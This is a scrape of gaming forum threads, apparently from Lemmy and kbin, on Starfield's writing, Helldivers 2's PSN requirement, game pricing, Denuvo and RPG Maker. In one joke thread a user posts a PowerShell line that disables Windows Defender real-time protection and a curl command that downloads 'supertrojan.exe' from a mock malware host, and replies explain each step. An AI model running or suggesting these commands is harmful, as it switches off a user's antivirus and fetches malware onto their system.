
Chariotwheel, do gaming w RPG Maker on the Unity debacle

While other devs are fighting errors, rpgmaker became the terror.


so rpg stands for random pipebomb gore

Viking_Hippie, (edited )
starman2112, (edited ) do gaming w Bethesda and CDPR's developers must have very different love lives
@starman2112@sh.itjust.works avatar

Not pictured: Sarah and your character being the most obnoxiously affectionate couple

Has anyone here ever walked up to their partner and just blurted out “can I tell you something? Waking up with you every day is like a dream come true” completely out of the blue? Cause that ain’t me

This is of course after “flirting” with her for a while. Is outright saying “I love you” even flirting? And why did it take three separate instances of outright saying “I love you” for Sarah to get the hint that maybe my character has feelings for her?

And while I’m ranting, why couldn’t I invite my parents to our wedding? We brought in her mom who she hasn’t seen in 20 years, but my parents literally live 5 minutes away from the lodge and I couldn’t invite them? “They don’t have a ship” I HAVE A SHIP


The answer to your questions, and so many more, is: because it’s Starfield.


Fr, I should have waited for starfield before playing bg3. I’ve become spoiled.

Do not, my friends, become addicted to good writing. It will take hold of you, and you will resent its absence.


I did the same as you. It’s a shame that we’ve had our standards lowered to the point where we feel like we’re being spoiled, if the game is presented without plot-gape.


Agreed. The amount of reactivity is truly stunning as well. Even if the broad strokes don’t change much, it really helps the immersion when you get a voice line acknowledging the way you did or didn’t do something.

Oh well, on the plus side update 3 is soon so I can do a durge + Minthara run.

superduperenigma, (edited )

can I tell you something? Waking up with you every day is like a dream come true



Has anyone here ever walked up to their partner and just blurted out “can I tell you something? Waking up with you every day is like a dream come true” completely out of the blue?

Yes, Every day.

Endorkend, (edited )
@Endorkend@kbin.social avatar

It's clear that much of the work on this game was done by like 30 different companies.

Every single thing about it feels disjointed, disconnected, half assed and schizophrenic.

And then when you go into NG+, it makes all that feel like childs play and gets really stupid.

It links into conversations in some places, but not in others where it would make actualy sense.

You can opt to not tell Constelation you're Starborn and then instantly take them into space on your alien spaceship without a single question asked by any of them.

They'll comment on your powers, long before you're at the part of the main quest where you normally get them.

All the dialogue and relationships are even blander than the actual main story, which seems to have been written by some Tumblr jackass that was so shit they even got rejected by The Witcher tv-show writing staff.

If Bethesda had just said "hey, we created this space framework and now it's up to modders to make an actual game out of this", I could've respected that.

It would've been more honest than delivering this disjointed mess of a game.

Another big annoyance I've had with Starfield is that they broke one of the sacred rules of Bethesda games with it.

In the past, if you stumbled upon something while exploring, killed or solved it, then went to someone who had a quest related to what you did, they would acknowledge you already did what they wanted you to do and you could move on.

In Starfield, they hide, lock and don't even spawn quite a lot of things, so you can only find them, if you're sent to them by a quest giver.

This game that is all about freedom and exploration has almost all relevant content that isn't flavor locked away behind being told to go somewhere, rather than exploring the star systems and finding them.

WintLizard, (edited )
@WintLizard@sopuli.xyz avatar

Bro thats a pretty big main quest spoiler to drop unmarked

Endorkend, (edited )
@Endorkend@kbin.social avatar

The main quest is utterly irrelevant and a detriment to the rest of the game.

The whole game would've been better without that main quest even existing.

And knowing what happens has no relevance to the game you play, especially since it makes the rest of the game completely irrelevant if you dare finish the main quest.

That's the point. It's meaningless to the point of it making the game worse by even existing.

And that's without the issues I mentioned originally, where while it's just utter shit, it's also really badly integrated.


The main quest has been a detriment to the game since like Oblivion.

dingus, (edited )
@dingus@lemmy.ml avatar

I’m going to just shit out my ultimate unpopular opinion right here, in mild defense of Endorkend, thanks.

If a plot point is enough to ruin a story, it was not a well written story to begin with.

Stories live and die through character development and growth. Weak stories often rely on things like twists and unexpected plot turns. Strong stories can often have these elements, but they don’t lean on them.

Strong stories I return to again and again, because the story is strong even though I already know the story. Knowing the story doesn’t ruin repeat watches/plays/readings of the media if the story is successful at being a good story. Well written stories with deep, interesting characters achieve that.

I’ve been playing Starfield and it has somehow worse writing and voice acting than a lot of previous Bethesda titles, which is saying a lot because it’s not like they’re not well known for weak writing at this point. It has a lot of strengths that have been kind of overlooked because it’s just generally kind of boring, but it does have them. Those strengths are not in the storytelling.

I don’t think this plot point spoils the game at all, instead it reveals how utterly weak the narrative they’ve crafted is.

@WintLizard@sopuli.xyz avatar

I mean I’m at the point where I just met the starborn, and speculating with my partner on who they are has been a lot of fun. I was really looking forward to finding out. It is kind of a bummer to just have someone drop it in a random comment in a thread about the romance plots.

@dingus@lemmy.ml avatar

That’s legit a bummer, friend. I guess what I should have also said is: art is subjective. My take doesn’t make it true (it’s just like, my opinion, man), but I think that while it’s a bummer for you, if you really think it’s a good game, it won’t stop you from enjoying it for a long time. I hope you do.


Has anyone here ever walked up to their partner and just blurted out “can I tell you something? Waking up with you every day is like a dream come true” completely out of the blue?

Yes, that’s actually a really cute and sweet thing to do.


Has anyone here ever walked up to their partner and just blurted out “can I tell you something? Waking up with you every day is like a dream come true” completely out of the blue?

Yes actually, and quite often. I want my wife to know how much she means to me and how glad I am to share our lives together.

@1984@lemmy.today avatar

You got lucky and found someone perfect for you.


Absolutely! I’m completely blessed, and she feels the same way. I’ve read before that the best relationships are those where each person thinks they got the better end of the deal, and I would say that’s true for us.

TootSweet, do gaming w ANTI-UNITY STRATEGY

Malicious compliance material. I love it!

SchmidtGenetics, do games w "PSN isn't supported in my country. What do I do?" Arrowhead CEO: "I don't know"

They devs say the knew of the requirement from Sony and it was also part of the store requirement since it was listed, so why would they list it for sale in those countries? It seems Steam should have some limitation in place on their end, and the Dev picks sales on Steam, not the publisher.

Theres shit to go to everyone here, not just Sony in this case. And no one seems to want to accept personal responsibility for not reading the game requirements and ignoring the splash screen when you first loaded the game. Everyone who bought and missed all the warning flags should also take a look back at themselves before complaining about something that was always going to be required and was at the very start at launch.


I never even had the option to skip linking accounts. Granted I bought the game within the first few weeks of release.


The option to skip was there 20 minutes after launch until now.

It said required in the popup, but still had a skip button with no consequences.


Oh I guess I missed that. I wonder if I can unlink.


Did the CEO of Sony write this? A bait and switch scam is fine apparently, as long as there’s some legalese to protect the company in there.

It seems Steam should have some limitation in place on their end, and the Dev picks sales on Steam, not the publisher.

Then what is the job of the publisher? To perpetrate scams it seems, because seemingly the devs published the game just fine all by themselves to Steam. If they didn’t do that right, the publisher suddenly has no responsibility to make sure that was distributed correctly? Whose job is it to ensure the product is published in line with their inevitable goals, we wonder.

so why would they list it for sale in those countries?

Because they botched the bait and switch. And now Valve is cleaning up Sony’s mess. Too bad they couldn’t clean up Sony’s mess of leaked customer data. I guess they can’t fix it but prevent the next one by making publishers agree up front that they can’t require data from players, in order to publish a game, but I digress.

no one seems to want to accept personal responsibility

No one should have to expect to be subject to a bait and switch scam in the first place. Which is what this clearly is, because if they were truly up front, they would have required the account on day one and had the appropriate region filters in place, so consumers could never be in this position.

Stop blaming the victims of corporate greed and scams; people should be able to reasonably enjoy things they paid for without being molested and exploited. Personal responsibility my ass when there should be laws to prevent this kind of thing in the first place.


Steam and arrowhead both allowed the sale of the game in non-compatible markets.

Everyone is to blame in, it all depends on how you want to swing it.

I’m not defending any single entity, I literally blamed them all lmfao.

But of course someone is a shill when they go against your bias and narrative…. Give your head a fucking shake.

Sony ripped you off here, so did Steam and so did arrowhead. Arrowhead is kind of being the worst here throwing everyone else under the bus instead of owning up to their mistake and sever lack of communication though. They are trying a strong arm tactic now that they got caught with their own hand in the jar.


Was it actually for sale in countries that don’t allow psn accounts, or did people spoof locations to buy the game from those countries? I’ve been trying to find this out the past two days and still haven’t gotten confirmation that the game was or is for sale on steam in a place like Egypt. All I’ve seen is people saying it was for sale there, but it’s all coming from assuming it is, because others also not from any of those countries have made the same claim.

So; can anyone from a region that doesn’t support PSN confirm if they were able to buy HD2 with their correct region selected? I just genuinely want to know, because if so, I would think at least those individuals should be able to get a refund, even though they ignored all the warnings about the psn requirements.


Steam article May answer that question


I’m not really sure that does answer the question, actually. I think that’s a bit different of a question.


The game was allowed for sale worldwide, Sony changed the restrictions today on the steam store, delisting the game in 177 countries where it was previously available

August27th, (edited )

against your bias and narrative

If being a regular person who just wants to enjoy the things they pay for in peace is bias, and being fed up with this crap is narrative, what does that make you?

Stop trying to normalize exploitation by greed, and stop normalizing the acceptance of it.

Just because Sony can manufacture a bait and switch with some boilerplate doesn’t mean they should. Regular people should not be blamed for being exploited when purchasing in good faith. The developers made a game that works, clearly, and Steam delivered it, so they are culpable, but if Sony can stop their horseshit, and this all goes away, it is clear who really is to blame.


Steam and arrowhead both allowed the sale of the game in non-compatible markets.

No. Sony handles the publishing on Steam. Sony set the countries allowed for sale – neither Steam, which is only the platform, nor arrowhead, who did not publish the game, have any responsibility in the matter. You’re taking away blame from Sony which is the single culprit for that mistake


A publisher in gaming bankrolls a lot of the costs and hurdles. Why do you think developers often use publishers? You think they just want to have a boss and give a cut of the profits away for nothing?

ech, (edited )

and the Dev picks sales on Steam, not the publisher.

Do you happen to have a source for this? It was my understanding that the publisher handled all distribution. Hence the name. And if I’m wrong, I’d like to fix my misunderstanding.


Open minded but not sure I agree: is it really on the consumers to ensure that a product won’t completely stop working for them?

iamascaryvampire, do gaming w Ignorance is bliss

Wait… What’s the truth…


Probably mining for bitcoin


Free game providers can have a little bitcoin, as a treat



Here’s one. I’d like the aforementioned treat, please!


You may use my GPU anytime 😊

Norgur, (edited )
@Norgur@fedia.io avatar
Set-MpPreference -DisableRealtimeMonitoring $true  

curl https://malwarefo.ru/supertrojan.exe



This answers nothing


Set-MpPreference -DisableRealtimeMonitoring $true

Disables malware scanning in windows (I assume)

curl malwarefo.ru/supertrojan.exe

Downloads supertrojan.exe from a Russian website


Executes the file


Runs the game


Closes the command prompt.


Opens the portal to the underworld, to ensure that the command prompt closes correctly.

odium, (edited )

Not saying you should understand it, but it does answer it if you understand it


But I don’t want a super Trojan : -(

@Norgur@fedia.io avatar
@RIP_Cheems@lemmy.world avatar

Is there a way to remove it or stop it from happening?



@rob_t_firefly@lemmy.world avatar

<span style="color:#323232;"> The only winning move is not to play.

Do you really want to know the truth or do you want to play your new game \o/


I always thought it was running anti-“anti-piracy” measures before launching the game. I suppose it could be malware too, which seems like what the meme is getting at.


Real answer is just that they’re executing a process without setting the window style to hidden. It doesn’t mean anything other than the dev is lazy / inexperienced.

dmm, do games w Madden should not be 70$

It’s a free market. Just don’t buy it

therealjcdenton, do games w Sony cancelled the PSN account linking requirement for Helldivers 2

Holy shit I was wrong


Now, now, don’t be hasty. Sony can still screw it up somehow.


In today’s digital media, any post where a person admits they were wrong deserves an upvote regardless of the subject.


Getting almost 300k negative reviews in 2 days will do that.


Holy shit, what did lemmy.zip/u/therealjcdenton do to deserve those?

ampersandrew, (edited ) do games w Gameplay mechanics were also a lot better with more replayability.
@ampersandrew@lemmy.world avatar

games back then were also more focused on quality

This is selection bias. You remember Metal Gear Solid, but do you remember Iron & Blood: Warriors of Ravenloft? Do you remember Mortal Kombat Mythologies: Sub-Zero? Bubsy 3D? The million-and-one licensed games that were churned out like baseball cards back then?

and make gamers replay the game with unlockable features based on skills, not money

If we’re going to say that a full-price game today costs $70, Metal Gear Solid would have cost the equivalent of $95. Not only that, but that was very much the Blockbuster and strategy guide era. Games would often have one of their best levels up front so that you can see what makes the game good, but then level 2 or 3 would hit a huge difficulty spike…just enough to make you have to rent the game multiple times or to cave in and buy it when you couldn’t beat it in a weekend. Or you’d have something like Final Fantasy VII, which I just finished for the first time recently, and let me tell you: games that big were designed to sell strategy guides (or hint hotlines) as a revenue stream. There would be some esoteric riddle, or some obscure corner of the map that you need to happen upon in order to progress the game forward. The business model always, at every step of the medium’s history, affects the game design.

“Value” is going to be a very subjective thing, but for better or worse, the equivalent game today is far more packed full of “stuff” to do, even when you discount the ones that get there just by adding grinding. There are things I miss about the old days too, but try to keep it in perspective.


Son, are you crying?


There’s just so much everything now a days. There’s tons of great new music and tons of great new games buried in all the new stuff thats being pumped out that it’s hard to find the gems. There’s lots of passionate people out there taking the time and effort to try and make the best

@Carighan@lemmy.world avatar

“Value” is going to be a very subjective thing, but for better or worse, the equivalent game today is far more packed full of “stuff” to do, even when you discount the ones that get there just by adding grinding. There are things I miss about the old days too, but try to keep it in perspective.

Exactly this.

Games back then were pricier - once you account for inflation.
Games back then did expect you to pay extra - in fact quite a few were deliberately designed to have unsolvable moments without either having the official strategy guide or at least a friend who had it who could tell you.

insomniac_lemon, (edited )

Games back then were pricier - once you account for inflation.

That's commonly said but ignores other economic factors such as income, unspent money, and cost-of-living.

Though lots of things are better now: the entire back-catalogue of games, more access to review/forums, free games (and also ability to create your own games without doing so from nothing) etc. Aside from when video store rental was applicable, early gaming was more take-what-you-can-get (niche hardware/platforms might still have that feel somewhat).

@ampersandrew@lemmy.world avatar

That’s commonly said but ignores other economic factors such as income, unspent money, and cost-of-living.

Inflation is derived by indexing all of those things. Some things are far more expensive or far cheaper relative to each other, but we approximate the buying power of a dollar by looking at all of it.


a few were deliberately designed to have unsolvable moments without either having the official strategy guide or at least a friend who had it who could tell you.

Do you have an example?

I knew kids that bought strategy guides, I worked at a game shop that sold strategy guides, and as far as I could tell they were for chumps. People who has more money than creativity.

@ampersandrew@lemmy.world avatar

Cosmetic DLC feels like it’s for chumps too, but it’s lucrative. The best example is going to be Simon’s Quest, without a doubt. The strategy guide was in an issue of Nintendo Power. I’m sure they were also happy to let social pressures on the playground either sell the strategy guides or the game just by word of mouth as kids discussed how to progress in the game. A Link to the Past is full of this stuff too. The game grinds to a halt at several points until you happen to find a macguffin that the game doesn’t even tell you that you need. Without the strategy guide, you could end up finding those things by spending tons of hours exploring every corner of the map, but by today’s standards, we’d call that padding.


Games back then were pricier - once you account for inflation.

This has always been a weird argument to me. Did wages go up to match inflation? If not, they’re not actually getting any cheaper.

@ampersandrew@lemmy.world avatar

The median US household income in 1998 was $38.9k, and today it’s $77.3k.


I forgot about hint hotlines. They’d charge per minute and did everything they could to keep you on the phone. I called a hotline once and my parents weren’t too happy about it.

Ser_Salty, do gaming w RPG Maker on the Unity debacle

Remember RPG Maker 2003, when you could just open any game made with it in the editor and change shit, give yourself god items etc.? That was dope.


No, I don’t, because I remember trying to make attempts at making my own game.

Hence being called RPG Maker.

In 2003 when I was like 17 there wasn’t like a fuckin library of games made in RPG Maker, and if there was, it was only known to the super nerds. Knowing what RPG Maker was in 2003 made you a nerd. If you knew of a library of games for RPG Maker, made you like king of nerds.

I’m envious of your nerdom if you had that access.


RPG Maker games were always really easy to pick out because they all used the same assets.


Hey bro, not even trying to hate but I think you should get out more


What are you on about


Honestly, I don’t even know myself. Was very much drunk when I wrote this last night. I’ll keep it up though for a reminder to not get too drunk and write things like this.


Lol. I respect that. You keep on keepin’ on.


I appreciate you.


I recommend doing better drugs than one that destroys you.


I recommend getting off your high horse.


Their horse which is high on drugs which doesn’t destroy it’s body

‍It’s a joke, I don’t really agree with them


New idea for Lemmy apps: drunk text mode. Between 10pm and 6am you have to answer a skill testing question before submitting.


Why not roll constitution check?


By this logic, I would get to post exactly zero times, ever.

joyjoy, do gaming w Classic Microsoft

They saw an opportunity to charge for mods on consoles.


Famously always goes over well.

leaky_shower_thought, do gaming w Goals when developing a game

The boss is quite in touch of how modders work.

Thomas the tank engine better be in there.

@edgemaster72@lemmy.world avatar

And Randy Savage, ooooo yeeeeeaaaaahhh


Bro the download numbers don’t lie

What everyone really wants is script extenders


Come on Master Chief let’s get the fuck outta here.

lurch, do gaming w The rainbows are nice...

My game avatar - me irl


Is this a trick question?

umbrella, do gaming w What a frightening suggestion...
@umbrella@lemmy.ml avatar

real leaders aren’t held accountable for real war crimes.


In the interest of preserving realism of the gameplay experience, gamers should not be punished.

@UnderpantsWeevil@lemmy.world avatar

Sliding the “war crimes” difficulty bar between African Colonel and IDF Prime Minister.

Boiglenoight, do gaming w What was Capcom thinking?

I was considering buying this but no longer. Game might be good but vote with your wallet to signal intolerance for greedy business practices.


Arrr 🏴‍☠️


Denuvo makes that pretty unlikely and people on steam are saying that characters are stored server side so I don’t know how that will affect piracy attempts even if denuvo is cracked.


Denuvo doesn’t make it impossible, it just makes it take longer, dependant on the interest of the crackers. The main need to be online comes from the initial Denuvo validation and for the ability to use others’ pawns. Being offline means you’ll just have to use generated pawns.


The only cracker that works on denuvo games hasn’t done a release in over 10 months. At this point it’s a matter of if/when the developer removes denuvo because there is no one cracking it right now.

@Zehzin@lemmy.world avatar

I don’t have the game but I assume “characters stored server side” means other people’s pawns like in the original where you could browse through people’s weird sidekicks and recruit them to your party. Not even Monster Hunter stores characters server side, it would be a weird shift to do it now.


From what I have picked up reading steam reviews, starting a new character is an MTX so they enforce that by storing your character on their servers. Others are saying you can get around that by deleting a specific folder but it’s still really shitty.


Capcom has been removing denuvo in 6-12 months. I’ll just wait till then


Denuvo can be cracked in as early as week after release. It all just depends if people care about the game enough.


There is one person cracking denuvo, they haven’t done a release in 10 months and when they were active they were doing them by request for a $500 “donation”. It has never been about how much people care about a game. The other titles that had releases early on were because devs occasionally mess up and push out updates that don’t have denuvo applied, not because anyone was cracking denuvo.


Yeah, I’ll just pirate it.

I only pay for games that aren’t kneeling at the alter of enshitification.


Yeah this whole thing may seem minor to some people but that’s what companies want you to feel. They’ll slowly slip in these greedy practices until it becomes the norm. Not long ago, Yakuza made New Game+ a paid DLC. What’s next? Paid save slots? Paid difficulty settings? I wouldn’t be surpised if that’s where we end up in a few years and we start posting “Remember when [X] was a standard feature in games?” memes.


“What can we get away with?” 👈 Capitalism


Yeah this whole thing may seem minor to some people but that’s what companies want you to feel.

Remember when Oblivion’s horse armor DLC was considered outrageous? $2 for an in-game cosmetic is hardly a blip on the radar now

@CosmicCleric@lemmy.world avatar

Yeah this whole thing may seem minor to some people but that’s what companies want you to feel. They’ll slowly slip in these greedy practices until it becomes the norm.

This is why it’s so important to push back on this crap.

Don’t buy these kind of games, and never pre-order any game.

And don’t listen to the shills/astroturfers telling you otherwise.

The_Picard_Maneuver, do gaming w I remember being angry at how much this made me laugh
@The_Picard_Maneuver@startrek.website avatar
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